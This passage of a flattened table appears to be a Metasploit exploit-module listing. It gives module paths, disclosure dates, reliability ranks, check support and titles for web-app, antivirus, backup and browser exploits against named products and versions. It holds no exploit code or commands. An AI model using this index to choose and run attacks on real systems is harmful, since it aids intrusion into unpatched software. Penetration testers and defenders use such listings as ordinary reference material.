2009-08-31 excellent No osCommerce 2.2 Arbitrary PHP Code Execution - unix/webapp/pajax_remote_exec 2006-03-30 excellent No PAJAX Remote Command Execution - unix/webapp/php_charts_exec 2013-01-16 excellent Yes PHP-Charts v1.0 PHP Code Execution Vulnerability - unix/webapp/php_eval 2008-10-13 manual Yes Generic PHP Code Evaluation - unix/webapp/php_include 2006-12-17 normal Yes PHP Remote File Include Generic Code Execution - unix/webapp/php_vbulletin_template 2005-02-25 excellent Yes vBulletin misc.php Template Name Arbitrary Code Execution - unix/webapp/php_xmlrpc_eval 2005-06-29 excellent Yes PHP XML-RPC Arbitrary Code Execution - unix/webapp/phpbb_highlight 2004-11-12 excellent No phpBB viewtopic.php Arbitrary Code Execution - unix/webapp/phpcollab_upload_exec 2017-09-29 excellent Yes phpCollab 2.5.1 Unauthenticated File Upload - unix/webapp/phpmyadmin_config 2009-03-24 excellent No PhpMyAdmin Config File Code Injection - unix/webapp/piwik_superuser_plugin_upload 2017-02-05 excellent No Piwik Superuser Plugin Upload - unix/webapp/projectpier_upload_exec 2012-10-08 excellent Yes Project Pier Arbitrary File Upload Vulnerability - unix/webapp/projectsend_upload_exec 2014-12-02 excellent Yes ProjectSend Arbitrary File Upload - unix/webapp/qtss_parse_xml_exec 2003-02-24 excellent No QuickTime Streaming Server parse_xml.cgi Remote Execution - unix/webapp/redmine_scm_exec 2010-12-19 excellent No Redmine SCM Repository Arbitrary Command Execution - unix/webapp/seportal_sqli_exec 2014-03-20 excellent Yes SePortal SQLi Remote Code Execution - unix/webapp/simple_e_document_upload_exec 2014-01-23 excellent Yes Simple E-Document Arbitrary File Upload - unix/webapp/sixapart_movabletype_storable_exec 2015-02-11 good Yes SixApart MovableType Storable Perl Code Execution - unix/webapp/skybluecanvas_exec 2014-01-28 excellent Yes SkyBlueCanvas CMS Remote Code Execution - unix/webapp/sphpblog_file_upload 2005-08-25 excellent Yes Simple PHP Blog Remote Command Execution - unix/webapp/spip_connect_exec 2012-07-04 excellent Yes SPIP connect Parameter PHP Injection - unix/webapp/squash_yaml_exec 2013-08-06 excellent Yes Squash YAML Code Execution - unix/webapp/squirrelmail_pgp_plugin 2007-07-09 manual No SquirrelMail PGP Plugin Command Execution (SMTP) - unix/webapp/sugarcrm_rest_unserialize_exec 2016-06-23 excellent No SugarCRM REST Unserialize PHP Code Execution - unix/webapp/sugarcrm_unserialize_exec 2012-06-23 excellent No SugarCRM unserialize() PHP Code Execution - unix/webapp/tikiwiki_graph_formula_exec 2007-10-10 excellent Yes TikiWiki tiki-graph_formula Remote PHP Code Execution - unix/webapp/tikiwiki_jhot_exec 2006-09-02 excellent Yes TikiWiki jhot Remote Command Execution - unix/webapp/tikiwiki_unserialize_exec 2012-07-04 excellent No Tiki Wiki unserialize() PHP Code Execution - unix/webapp/tikiwiki_upload_exec 2016-07-11 excellent Yes Tiki Wiki Unauthenticated File Upload Vulnerability - unix/webapp/trixbox_langchoice 2008-07-09 manual Yes Trixbox langChoice PHP Local File Inclusion - unix/webapp/tuleap_rest_unserialize_exec 2017-10-23 excellent Yes Tuleap 9.6 Second-Order PHP Object Injection - unix/webapp/tuleap_unserialize_exec 2014-11-27 excellent Yes Tuleap PHP Unserialize Code Execution - unix/webapp/twiki_history 2005-09-14 excellent Yes TWiki History TWikiUsers rev Parameter Command Execution - unix/webapp/twiki_maketext 2012-12-15 excellent Yes TWiki MAKETEXT Remote Command Execution - unix/webapp/twiki_search 2004-10-01 excellent Yes TWiki Search Function Arbitrary Command Execution - unix/webapp/vbulletin_vote_sqli_exec 2013-03-25 excellent Yes vBulletin index.php/ajax/api/reputation/vote nodeid Parameter SQL Injection - unix/webapp/vicidial_manager_send_cmd_exec 2013-10-23 excellent Yes VICIdial Manager Send OS Command Injection - unix/webapp/vicidial_user_authorization_unauth_cmd_exec 2017-05-26 excellent Yes VICIdial user_authorization Unauthenticated Command Execution - unix/webapp/webmin_show_cgi_exec 2012-09-06 excellent Yes Webmin /file/show.cgi Remote Command Execution - unix/webapp/webtester_exec 2013-10-17 excellent Yes WebTester 5.x Command Execution - unix/webapp/wp_admin_shell_upload 2015-02-21 excellent Yes WordPress Admin Shell Upload - unix/webapp/wp_advanced_custom_fields_exec 2012-11-14 excellent Yes WordPress Plugin Advanced Custom Fields Remote File Inclusion - unix/webapp/wp_ajax_load_more_file_upload 2015-10-10 excellent Yes Wordpress Ajax Load More PHP Upload Vulnerability - unix/webapp/wp_asset_manager_upload_exec 2012-05-26 excellent Yes WordPress Asset-Manager PHP File Upload Vulnerability - unix/webapp/wp_creativecontactform_file_upload 2014-10-22 excellent Yes Wordpress Creative Contact Form Upload Vulnerability - unix/webapp/wp_downloadmanager_upload 2014-12-03 excellent Yes Wordpress Download Manager (download-manager) Unauthenticated File Upload - unix/webapp/wp_easycart_unrestricted_file_upload 2015-01-08 excellent No WordPress WP EasyCart Unrestricted File Upload - unix/webapp/wp_foxypress_upload 2012-06-05 excellent Yes WordPress Plugin Foxypress uploadify.php Arbitrary Code Execution - unix/webapp/wp_frontend_editor_file_upload 2012-07-04 excellent Yes Wordpress Front-end Editor File Upload - unix/webapp/wp_google_document_embedder_exec 2013-01-03 normal Yes WordPress Plugin Google Document Embedder Arbitrary File Disclosure - unix/webapp/wp_holding_pattern_file_upload 2015-02-11 excellent Yes WordPress Holding Pattern Theme Arbitrary File Upload - unix/webapp/wp_inboundio_marketing_file_upload 2015-03-24 excellent Yes Wordpress InBoundio Marketing PHP Upload Vulnerability - unix/webapp/wp_infusionsoft_upload 2014-09-25 excellent Yes Wordpress InfusionSoft Upload Vulnerability - unix/webapp/wp_lastpost_exec 2005-08-09 excellent No WordPress cache_lastpostdate Arbitrary Code Execution - unix/webapp/wp_mobile_detector_upload_execute 2016-05-31 excellent Yes WordPress WP Mobile Detector 3.5 Shell Upload - unix/webapp/wp_nmediawebsite_file_upload 2015-04-12 excellent Yes Wordpress N-Media Website Contact Form Upload Vulnerability - unix/webapp/wp_optimizepress_upload 2013-11-29 excellent Yes WordPress OptimizePress Theme File Upload Vulnerability - unix/webapp/wp_photo_gallery_unrestricted_file_upload 2014-11-11 excellent Yes WordPress Photo Gallery Unrestricted File Upload - unix/webapp/wp_phpmailer_host_header 2017-05-03 average Yes WordPress PHPMailer Host Header Command Injection - unix/webapp/wp_pixabay_images_upload 2015-01-19 excellent Yes WordPress Pixabay Images PHP Code Upload - unix/webapp/wp_platform_exec 2015-01-21 excellent No WordPress Platform Theme File Upload Vulnerability - unix/webapp/wp_property_upload_exec 2012-03-26 excellent Yes WordPress WP-Property PHP File Upload Vulnerability - unix/webapp/wp_reflexgallery_file_upload 2012-12-30 excellent Yes Wordpress Reflex Gallery Upload Vulnerability - unix/webapp/wp_revslider_upload_execute 2014-11-26 excellent Yes WordPress RevSlider File Upload and Execute Vulnerability - unix/webapp/wp_slideshowgallery_upload 2014-08-28 excellent Yes Wordpress SlideShow Gallery Authenticated File Upload - unix/webapp/wp_symposium_shell_upload 2014-12-11 excellent Yes WordPress WP Symposium 14.11 Shell Upload - unix/webapp/wp_total_cache_exec 2013-04-17 excellent Yes WordPress W3 Total Cache PHP Code Execution - unix/webapp/wp_worktheflow_upload 2015-03-14 excellent Yes Wordpress Work The Flow Upload Vulnerability - unix/webapp/wp_wpshop_ecommerce_file_upload 2015-03-09 excellent Yes WordPress WPshop eCommerce Arbitrary File Upload Vulnerability - unix/webapp/wp_wptouch_file_upload 2014-07-14 excellent Yes WordPress WPTouch Authenticated File Upload - unix/webapp/wp_wysija_newsletters_upload 2014-07-01 excellent Yes Wordpress MailPoet Newsletters (wysija-newsletters) Unauthenticated File Upload - unix/webapp/xoda_file_upload 2012-08-21 excellent Yes XODA 0.4.5 Arbitrary PHP File Upload Vulnerability - unix/webapp/zeroshell_exec 2013-09-22 excellent Yes ZeroShell Remote Code Execution - unix/webapp/zimbra_lfi 2013-12-06 excellent Yes Zimbra Collaboration Server LFI - unix/webapp/zoneminder_packagecontrol_exec 2013-01-22 excellent Yes ZoneMinder Video Server packageControl Command Execution - unix/webapp/zpanel_username_exec 2013-06-07 excellent Yes ZPanel 10.0.0.2 htpasswd Module Username Command Execution - unix/x11/x11_keyboard_exec 2015-07-10 excellent No X11 Keyboard Command Injection - windows/antivirus/ams_hndlrsvc 2010-07-26 excellent No Symantec System Center Alert Management System (hndlrsvc.exe) Arbitrary Command Execution - windows/antivirus/ams_xfr 2009-04-28 excellent No Symantec System Center Alert Management System (xfr.exe) Arbitrary Command Execution - windows/antivirus/symantec_endpoint_manager_rce 2014-02-24 excellent Yes Symantec Endpoint Protection Manager /servlet/ConsoleServlet Remote Command Execution - windows/antivirus/symantec_iao 2009-04-28 good No Symantec Alert Management System Intel Alert Originator Service Buffer Overflow - windows/antivirus/symantec_rtvscan 2006-05-24 good No Symantec Remote Management Buffer Overflow - windows/antivirus/symantec_workspace_streaming_exec 2014-05-12 excellent Yes Symantec Workspace Streaming ManagementAgentServer.putFile XMLRPC Request Arbitrary File Upload - windows/antivirus/trendmicro_serverprotect 2007-02-20 good No Trend Micro ServerProtect 5.58 Buffer Overflow - windows/antivirus/trendmicro_serverprotect_createbinding 2007-05-07 good No Trend Micro ServerProtect 5.58 CreateBinding() Buffer Overflow - windows/antivirus/trendmicro_serverprotect_earthagent 2007-05-07 good No Trend Micro ServerProtect 5.58 EarthAgent.EXE Buffer Overflow - windows/arkeia/type77 2005-02-18 good Yes Arkeia Backup Client Type 77 Overflow (Win32) - windows/backdoor/energizer_duo_payload 2010-03-05 excellent No Energizer DUO USB Battery Charger Arucer.dll Trojan Code Execution - windows/backupexec/name_service 2004-12-16 average No Veritas Backup Exec Name Service Overflow - windows/backupexec/remote_agent 2005-06-22 great Yes Veritas Backup Exec Windows Remote Agent Overflow - windows/backupexec/ssl_uaf 2017-05-10 normal Yes Veritas/Symantec Backup Exec SSL NDMP Connection Use-After-Free - windows/brightstor/ca_arcserve_342 2008-10-09 average No Computer Associates ARCserve REPORTREMOTEEXECUTECML Buffer Overflow - windows/brightstor/discovery_tcp 2005-02-14 average Yes CA BrightStor Discovery Service TCP Overflow - windows/brightstor/discovery_udp 2004-12-20 average Yes CA BrightStor Discovery Service Stack Buffer Overflow - windows/brightstor/etrust_itm_alert 2008-04-04 average No Computer Associates Alert Notification Buffer Overflow - windows/brightstor/hsmserver 2007-09-27 great No CA BrightStor HSM Buffer Overflow - windows/brightstor/lgserver 2007-01-31 average No CA BrightStor ARCserve for Laptops and Desktops LGServer Buffer Overflow - windows/brightstor/lgserver_multi 2007-06-06 average Yes CA BrightStor ARCserve for Laptops and Desktops LGServer Multiple Commands Buffer Overflow - windows/brightstor/lgserver_rxrlogin 2007-06-06 average Yes CA BrightStor ARCserve for Laptops and Desktops LGServer Buffer Overflow - windows/brightstor/lgserver_rxssetdatagrowthscheduleandfilter 2007-06-06 average Yes CA BrightStor ARCserve for Laptops and Desktops LGServer rxsSetDataGrowthScheduleAndFilter Buffer Overflow - windows/brightstor/lgserver_rxsuselicenseini 2007-06-06 average Yes CA BrightStor ARCserve for Laptops and Desktops LGServer Buffer Overflow - windows/brightstor/license_gcr 2005-03-02 average No CA BrightStor ARCserve License Service GCR NETWORK Buffer Overflow - windows/brightstor/mediasrv_sunrpc 2007-04-25 average No CA BrightStor ArcServe Media Service Stack Buffer Overflow - windows/brightstor/message_engine 2007-01-11 average No CA BrightStor ARCserve Message Engine Buffer Overflow - windows/brightstor/message_engine_72 2010-10-04 average No CA BrightStor ARCserve Message Engine 0x72 Buffer Overflow - windows/brightstor/message_engine_heap 2006-10-05 average No CA BrightStor ARCserve Message Engine Heap Overflow - windows/brightstor/sql_agent 2005-08-02 average No CA BrightStor Agent for Microsoft SQL Overflow - windows/brightstor/tape_engine 2006-11-21 average No CA BrightStor ARCserve Tape Engine Buffer Overflow - windows/brightstor/tape_engine_0x8a 2010-10-04 average No CA BrightStor ARCserve Tape Engine 0x8A Buffer Overflow - windows/brightstor/universal_agent 2005-04-11 average No CA BrightStor Universal Agent Overflow - windows/browser/adobe_cooltype_sing 2010-09-07 great No Adobe CoolType SING Table "uniqueName" Stack Buffer Overflow - windows/browser/adobe_flash_avm2 2014-02-05 normal No Adobe Flash Player Integer Underflow Remote Code Execution - windows/browser/adobe_flash_casi32_int_overflow 2014-10-14 great No Adobe Flash Player casi32 Integer Overflow - windows/browser/adobe_flash_copy_pixels_to_byte_array 2014-09-23 great No Adobe Flash Player copyPixelsToByteArray Method Integer Overflow - windows/browser/adobe_flash_domain_memory_uaf 2014-04-14 great No Adobe Flash Player domainMemory ByteArray Use After Free - windows/browser/adobe_flash_filters_type_confusion 2013-12-10 normal No Adobe Flash Player Type Confusion Remote Code Execution - windows/browser/adobe_flash_mp4_cprt 2012-02-15 normal No Adobe Flash Player MP4 'cprt' Overflow - windows/browser/adobe_flash_otf_font 2012-08-09 normal No Adobe Flash Player 11.3 Kern Table Parsing Integer Overflow - windows/browser/adobe_flash_pcre 2014-11-25 normal No Adobe Flash Player PCRE Regex Vulnerability - windows/browser/adobe_flash_regex_value 2013-02-08 normal No Adobe Flash Player Regular Expression Heap Overflow - windows/browser/adobe_flash_rtmp 2012-05-04 normal No Adobe Flash Player Object Type Confusion - windows/browser/adobe_flash_sps 2011-08-09 normal No Adobe Flash Player MP4 SequenceParameterSetNALUnit Buffer Overflow - windows/browser/adobe_flash_uncompress_zlib_uninitialized 2014-11-11 good No Adobe Flash Player UncompressViaZlibVariant Uninitialized Memory - windows/browser/adobe_flash_worker_byte_array_uaf 2015-02-02 great No Adobe Flash Player ByteArray With Workers Use After Free - windows/browser/adobe_flashplayer_arrayindexing 2012-06-21 great No Adobe Flash Player AVM Verification Logic Array Indexing Code Execution - windows/browser/adobe_flashplayer_avm 2011-03-15 good No Adobe Flash Player AVM Bytecode Verification Vulnerability - windows/browser/adobe_flashplayer_flash10o 2011-04-11 normal No Adobe Flash Player 10.2.153.1 SWF Memory Corruption Vulnerability - windows/browser/adobe_flashplayer_newfunction 2010-06-04 normal No Adobe Flash Player "newfunction" Invalid Pointer Use - windows/browser/adobe_flatedecode_predictor02 2009-10-08 good No Adobe FlateDecode Stream Predictor 02 Integer Overflow - windows/browser/adobe_geticon 2009-03-24 good No Adobe Collab.getIcon() Buffer Overflow - windows/browser/adobe_jbig2decode 2009-02-19 good No Adobe JBIG2Decode Heap Corruption - windows/browser/adobe_media_newplayer 2009-12-14 good No Adobe Doc.media.newPlayer Use After Free Vulnerability - windows/browser/adobe_shockwave_rcsl_corruption 2010-10-21 normal No Adobe Shockwave rcsL Memory Corruption - windows/browser/adobe_toolbutton 2013-08-08 normal No Adobe Reader ToolButton Use After Free - windows/browser/adobe_utilprintf 2008-02-08 good No Adobe util.printf() Buffer Overflow - windows/browser/advantech_webaccess_dvs_getcolor 2014-07-17 normal No Advantech WebAccess dvs.ocx GetColor Buffer Overflow - windows/browser/aim_goaway 2004-08-09 great No AOL Instant Messenger goaway Overflow - windows/browser/aladdin_choosefilepath_bof 2012-04-01 normal No Aladdin Knowledge System Ltd ChooseFilePath Buffer Overflow - windows/browser/amaya_bdo 2009-01-28 normal No Amaya Browser v11.0 'bdo' Tag Overflow - windows/browser/aol_ampx_convertfile 2009-05-19 normal No AOL Radio AmpX ActiveX Control ConvertFile() Buffer Overflow - windows/browser/aol_icq_downloadagent 2006-11-06 excellent No America Online ICQ ActiveX Control Arbitrary File Download and Execute - windows/browser/apple_itunes_playlist 2005-01-11 normal No Apple ITunes 4.7 Playlist Buffer Overflow - windows/browser/apple_quicktime_marshaled_punk 2010-08-30 great No Apple QuickTime 7.6.7 _Marshaled_pUnk Code Execution - windows/browser/apple_quicktime_mime_type 2012-11-07 normal No Apple QuickTime 7.7.2 MIME Type Buffer Overflow - windows/browser/apple_quicktime_rdrf 2013-05-22 normal No Apple Quicktime 7 Invalid Atom Length Buffer Overflow - windows/browser/apple_quicktime_rtsp 2007-01-01 normal No Apple QuickTime 7.1.3 RTSP URI Buffer Overflow - windows/browser/apple_quicktime_smil_debug 2010-08-12 good No Apple QuickTime 7.6.6 Invalid SMIL URI Buffer Overflow - windows/browser/apple_quicktime_texml_font_table 2012-11-07 normal No Apple QuickTime 7.7.2 TeXML Style Element font-table Field Stack Buffer Overflow - windows/browser/ask_shortformat 2007-09-24 normal No Ask.com Toolbar askBar.dll ActiveX Control Buffer Overflow - windows/browser/asus_net4switch_ipswcom 2012-02-17 normal No ASUS Net4Switch ipswcom.dll ActiveX Stack Buffer Overflow - windows/browser/athocgov_completeinstallation 2008-02-15 normal No AtHocGov IWSAlerts ActiveX Control Buffer Overflow - windows/browser/autodesk_idrop 2009-04-02 normal No Autodesk IDrop ActiveX Control Heap Memory Corruption - windows/browser/aventail_epi_activex 2010-08-19 normal No SonicWALL Aventail epi.dll AuthCredential Format String - windows/browser/awingsoft_web3d_bof 2009-07-10 average No AwingSoft Winds3D Player SceneURL Buffer Overflow - windows/browser/awingsoft_winds3d_sceneurl 2009-11-14 excellent No AwingSoft Winds3D Player 3.5 SceneURL Download and Execute - windows/browser/baofeng_storm_onbeforevideodownload 2009-04-30 normal No BaoFeng Storm mps.dll ActiveX OnBeforeVideoDownload Buffer Overflow - windows/browser/barcode_ax49 2007-06-22 normal No RKD Software BarCodeAx.dll v4.9 ActiveX Remote Stack Buffer Overflow - windows/browser/blackice_downloadimagefileurl 2008-06-05 excellent No Black Ice Cover Page ActiveX Control Arbitrary File Download - windows/browser/c6_messenger_downloaderactivex 2008-06-03 excellent No Icona SpA C6 Messenger DownloaderActiveX Control Arbitrary File Download and Execute - windows/browser/ca_brightstor_addcolumn 2008-03-16 normal No CA BrightStor ARCserve Backup AddColumn() ActiveX Buffer Overflow - windows/browser/chilkat_crypt_writefile 2008-11-03 excellent No Chilkat Crypt ActiveX WriteFile Unsafe Method - windows/browser/cisco_anyconnect_exec 2011-06-01 excellent No Cisco AnyConnect VPN Client ActiveX URL Property Download and Execute - windows/browser/cisco_playerpt_setsource 2012-03-22 normal No Cisco Linksys PlayerPT ActiveX Control Buffer Overflow - windows/browser/cisco_playerpt_setsource_surl 2012-07-17 normal No Cisco Linksys PlayerPT ActiveX Control SetSource sURL Argument Buffer Overflow - windows/browser/cisco_webex_ext 2017-01-21 great No Cisco WebEx Chrome Extension RCE (CVE-2017-3823) - windows/browser/citrix_gateway_actx 2011-07-14 normal No Citrix Gateway ActiveX Control Stack Based Buffer Overflow Vulnerability - windows/browser/clear_quest_cqole 2012-05-19 normal No IBM Rational ClearQuest CQOle Remote Code Execution - windows/browser/communicrypt_mail_activex 2010-05-19 great No CommuniCrypt Mail 1.16 SMTP ActiveX Stack Buffer Overflow - windows/browser/creative_software_cachefolder 2008-05-28 normal No Creative Software AutoUpdate Engine ActiveX Control Buffer Overflow - windows/browser/crystal_reports_printcontrol 2010-12-14 normal No Crystal Reports CrystalPrintControl ActiveX ServerResourceVersion Property Overflow - windows/browser/dell_webcam_crazytalk 2012-03-19 normal No Dell Webcam CrazyTalk ActiveX BackImage Vulnerability - windows/browser/dxstudio_player_exec 2009-06-09 excellent No Worldweaver DX Studio Player shell.execute() Command Execution - windows/browser/ea_checkrequirements 2007-10-08 normal No Electronic Arts SnoopyCtrl ActiveX Control Buffer Overflow - windows/browser/ebook_flipviewer_fviewerloading 2007-06-06 normal No FlipViewer FViewerLoading ActiveX Control Buffer Overflow - windows/browser/enjoysapgui_comp_download 2009-04-15 excellent No EnjoySAP SAP GUI ActiveX Control Arbitrary File Download - windows/browser/enjoysapgui_preparetoposthtml 2007-07-05 normal No EnjoySAP SAP GUI ActiveX Control Buffer Overflow - windows/browser/exodus 2018-01-25 manual No Exodus Wallet (ElectronJS Framework) remote Code Execution - windows/browser/facebook_extractiptc 2008-01-31 normal No Facebook Photo Uploader 4 ActiveX Control Buffer Overflow - windows/browser/firefox_smil_uaf 2016-11-30 normal No Firefox nsSMILTimeContainer::NotifyTimeChange() RCE - windows/browser/foxit_reader_plugin_url_bof 2013-01-07 normal No Foxit Reader Plugin URL Processing Buffer Overflow - windows/browser/getgodm_http_response_bof 2014-03-09 normal No GetGo Download Manager HTTP Response Buffer Overflow - windows/browser/gom_openurl 2007-10-27 normal No GOM Player ActiveX Control Buffer Overflow - windows/browser/greendam_url 2009-06-11 normal No Green Dam URL Processing Buffer Overflow - windows/browser/honeywell_hscremotedeploy_exec 2013-02-22 excellent No Honeywell HSC Remote Deployer ActiveX Remote Code Execution - windows/browser/honeywell_tema_exec 2011-10-20 excellent No Honeywell Tema Remote Installer ActiveX Remote Code Execution - windows/browser/hp_alm_xgo_setshapenodetype_exec 2012-08-29 normal No HP Application Lifecycle Management XGO.ocx ActiveX SetShapeNodeType() Remote Code Execution - windows/browser/hp_easy_printer_care_xmlcachemgr 2012-01-11 great No HP Easy Printer Care XMLCacheMgr Class ActiveX Control Remote Code Execution - windows/browser/hp_easy_printer_care_xmlsimpleaccessor 2011-08-16 great No HP Easy Printer Care XMLSimpleAccessor Class ActiveX Control Remote Code Execution - windows/browser/hp_loadrunner_addfile 2008-01-25 normal No Persits XUpload ActiveX AddFile Buffer Overflow - windows/browser/hp_loadrunner_addfolder 2007-12-25 good No HP LoadRunner 9.0 ActiveX AddFolder Buffer Overflow - windows/browser/hp_loadrunner_writefilebinary 2013-07-24 normal No HP LoadRunner lrFileIOService ActiveX Remote Code Execution - windows/browser/hp_loadrunner_writefilestring 2013-07-24 normal No HP LoadRunner lrFileIOService ActiveX WriteFileString Remote Code Execution - windows/browser/hpmqc_progcolor 2007-04-04 normal No HP Mercury Quality Center ActiveX Control ProgColor Buffer Overflow - windows/browser/hyleos_chemviewx_activex 2010-02-10 good No Hyleos ChemView ActiveX Control Stack Buffer Overflow - windows/browser/ibm_spss_c1sizer 2013-04-26 normal No IBM SPSS SamplePower C1Tab ActiveX Heap Overflow - windows/browser/ibm_tivoli_pme_activex_bof 2012-03-01 normal No IBM Tivoli Provisioning Manager Express for Software Distribution Isig.isigCtl.1 ActiveX RunAndUploadFile() Method Overflow - windows/browser/ibmegath_getxmlvalue 2009-03-24 normal No IBM Access Support ActiveX Control Buffer Overflow - windows/browser/ibmlotusdomino_dwa_uploadmodule 2007-12-20 normal No IBM Lotus Domino Web Access Upload Module Buffer Overflow - windows/browser/ie_cbutton_uaf 2012-12-27 normal No MS13-008 Microsoft Internet Explorer CButton Object Use-After-Free Vulnerability - windows/browser/ie_cgenericelement_uaf 2013-05-03 good No MS13-038 Microsoft Internet Explorer CGenericElement Object Use-After-Free Vulnerability - windows/browser/ie_createobject 2006-04-11 excellent No MS06-014 Microsoft Internet Explorer COM CreateObject Code Execution - windows/browser/ie_execcommand_uaf 2012-09-14 good No MS12-063 Microsoft Internet Explorer execCommand Use-After-Free Vulnerability - windows/browser/ie_iscomponentinstalled 2006-02-24 normal No Microsoft Internet Explorer isComponentInstalled Overflow - windows/browser/ie_setmousecapture_uaf 2013-09-17 normal No MS13-080 Microsoft Internet Explorer SetMouseCapture Use-After-Free - windows/browser/ie_unsafe_scripting 2010-09-20 manual No Microsoft Internet Explorer Unsafe Scripting Misconfiguration - windows/browser/imgeviewer_tifmergemultifiles 2010-03-03 normal No Viscom Image Viewer CP Pro 8.0/Gold 6.0 ActiveX Control - windows/browser/indusoft_issymbol_internationalseparator 2012-04-28 normal No InduSoft Web Studio ISSymbol.ocx InternationalSeparator() Heap Overflow - windows/browser/inotes_dwa85w_bof 2012-06-01 normal No IBM Lotus iNotes dwa85W ActiveX Buffer Overflow - windows/browser/intrust_annotatex_add 2012-03-28 average No Quest InTrust Annotation Objects Uninitialized Pointer - windows/browser/java_basicservice_impl 2010-10-12 excellent No Sun Java Web Start BasicServiceImpl Code Execution - windows/browser/java_cmm 2013-03-01 normal No Java CMM Remote Code Execution - windows/browser/java_codebase_trust 2011-02-15 excellent No Sun Java Applet2ClassLoader Remote Code Execution - windows/browser/java_docbase_bof 2010-10-12 great No Sun Java Runtime New Plugin docbase Buffer Overflow - windows/browser/java_mixer_sequencer 2010-03-30 great No Java MixerSequencer Object GM_Song Structure Handling Vulnerability - windows/browser/java_ws_arginject_altjvm 2010-04-09 excellent No Sun Java Web Start Plugin Command Line Argument Injection - windows/browser/java_ws_double_quote 2012-10-16 excellent No Sun Java Web Start Double Quote Injection - windows/browser/java_ws_vmargs 2012-02-14 excellent No Sun Java Web Start Plugin Command Line Argument Injection - windows/browser/juniper_sslvpn_ive_setupdll 2006-04-26 normal No Juniper SSL-VPN IVE JuniperSetupDLL.dll ActiveX Control Buffer Overflow - windows/browser/kazaa_altnet_heap 2007-10-03 normal No Kazaa Altnet Download Manager ActiveX Control Buffer Overflow - windows/browser/keyhelp_launchtripane_exec 2012-06-26 excellent No KeyHelp ActiveX LaunchTriPane Remote Code Execution Vulnerability - windows/browser/logitechvideocall_start 2007-05-31 normal No Logitech VideoCall ActiveX Control Buffer Overflow - windows/browser/lpviewer_url 2008-10-06 normal No iseemedia / Roxio / MGI Software LPViewer ActiveX Control Buffer Overflow - windows/browser/macrovision_downloadandexecute 2007-10-31 normal No Macrovision InstallShield Update Service Buffer Overflow - windows/browser/macrovision_unsafe 2007-10-20 excellent No Macrovision InstallShield Update Service ActiveX Unsafe Method - windows/browser/malwarebytes_update_exec 2014-12-16 good No Malwarebytes Anti-Malware and Anti-Exploit Update Remote Code Execution - windows/browser/maxthon_history_xcs 2012-11-26 excellent No Maxthon3 about:history XCS Trusted Zone Code Execution - windows/browser/mcafee_mcsubmgr_vsprintf 2006-08-01 normal No McAfee Subscription Manager Stack Buffer Overflow - windows/browser/mcafee_mvt_exec 2012-04-30 excellent No McAfee Virtual Technician MVTControl 6.3.0.1911 GetObject Vulnerability - windows/browser/mcafeevisualtrace_tracetarget 2007-07-07 normal No McAfee Visual Trace ActiveX Control Buffer Overflow - windows/browser/mirc_irc_url 2003-10-13 normal No mIRC IRC URL Buffer Overflow - windows/browser/mozilla_attribchildremoved 2011-12-06 average No Firefox 8/9 AttributeChildRemoved() Use-After-Free - windows/browser/mozilla_firefox_onreadystatechange 2013-06-25 normal No Firefox onreadystatechange Event DocumentViewerImpl Use After Free - windows/browser/mozilla_firefox_xmlserializer 2013-01-08 normal No Firefox XMLSerializer Use After Free - windows/browser/mozilla_interleaved_write 2010-10-25 normal No Mozilla Firefox Interleaved document.write/appendChild Memory Corruption - windows/browser/mozilla_mchannel 2011-05-10 normal No Mozilla Firefox 3.6.16 mChannel Use-After-Free Vulnerability - windows/browser/mozilla_nssvgvalue 2011-12-06 average No Firefox nsSVGValue Out-of-Bounds Access Vulnerability - windows/browser/mozilla_nstreerange 2011-02-02 normal No Mozilla Firefox "nsTreeRange" Dangling Pointer Vulnerability - windows/browser/mozilla_reduceright 2011-06-21 normal No Mozilla Firefox Array.reduceRight() Integer Overflow - windows/browser/ms03_020_ie_objecttype 2003-06-04 normal No MS03-020 Microsoft Internet Explorer Object Type - windows/browser/ms05_054_onload 2005-11-21 normal No MS05-054 Microsoft Internet Explorer JavaScript OnLoad Handler Remote Code Execution - windows/browser/ms06_001_wmf_setabortproc 2005-12-27 great No Windows XP/2003/Vista Metafile Escape() SetAbortProc Code Execution - windows/browser/ms06_013_createtextrange 2006-03-19 normal No MS06-013 Microsoft Internet Explorer createTextRange() Code Execution - windows/browser/ms06_055_vml_method 2006-09-19 normal No MS06-055 Microsoft Internet Explorer VML Fill Method Code Execution - windows/browser/ms06_057_webview_setslice 2006-07-17 normal No MS06-057 Microsoft Internet Explorer WebViewFolderIcon setSlice() Overflow - windows/browser/ms06_067_keyframe 2006-11-14 normal No MS06-067 Microsoft Internet Explorer Daxctle.OCX KeyFrame Method Heap Buffer Overflow Vulnerability - windows/browser/ms06_071_xml_core 2006-10-10 normal No MS06-071 Microsoft Internet Explorer XML Core Services HTTP Request Handling - windows/browser/ms07_017_ani_loadimage_chunksize 2007-03-28 great No Windows ANI LoadAniIcon() Chunk Size Stack Buffer Overflow (HTTP) - windows/browser/ms08_041_snapshotviewer 2008-07-07 excellent No Snapshot Viewer for Microsoft Access ActiveX Control Arbitrary File Download - windows/browser/ms08_053_mediaencoder 2008-09-09 normal No Windows Media Encoder 9 wmex.dll ActiveX Buffer Overflow - windows/browser/ms08_070_visual_studio_msmask 2008-08-13 normal No Microsoft Visual Studio Mdmask32.ocx ActiveX Buffer Overflow - windows/browser/ms08_078_xml_corruption 2008-12-07 normal No MS08-078 Microsoft Internet Explorer Data Binding Memory Corruption - windows/browser/ms09_002_memory_corruption 2009-02-10 normal No MS09-002 Microsoft Internet Explorer 7 CFunctionPointer Uninitialized Memory Corruption - windows/browser/ms09_043_owc_htmlurl 2009-08-11 normal No Microsoft OWC Spreadsheet HTMLURL Buffer Overflow - windows/browser/ms09_043_owc_msdso 2009-07-13 normal No Microsoft OWC Spreadsheet msDataSourceObject Memory Corruption - windows/browser/ms09_072_style_object 2009-11-20 normal No MS09-072 Microsoft Internet Explorer Style getElementsByTagName Memory Corruption - windows/browser/ms10_002_aurora 2010-01-14 normal No MS10-002 Microsoft Internet Explorer "Aurora" Memory Corruption - windows/browser/ms10_002_ie_object 2010-01-21 normal No MS10-002 Microsoft Internet Explorer Object Memory Use-After-Free - windows/browser/ms10_018_ie_behaviors 2010-03-09 good No MS10-018 Microsoft Internet Explorer DHTML Behaviors Use After Free - windows/browser/ms10_018_ie_tabular_activex 2010-03-09 good No MS10-018 Microsoft Internet Explorer Tabular Data Control ActiveX Memory Corruption - windows/browser/ms10_022_ie_vbscript_winhlp32 2010-02-26 great No MS10-022 Microsoft Internet Explorer Winhlp32.exe MsgBox Code Execution - windows/browser/ms10_026_avi_nsamplespersec 2010-04-13 normal No MS10-026 Microsoft MPEG Layer-3 Audio Stack Based Overflow - windows/browser/ms10_042_helpctr_xss_cmd_exec 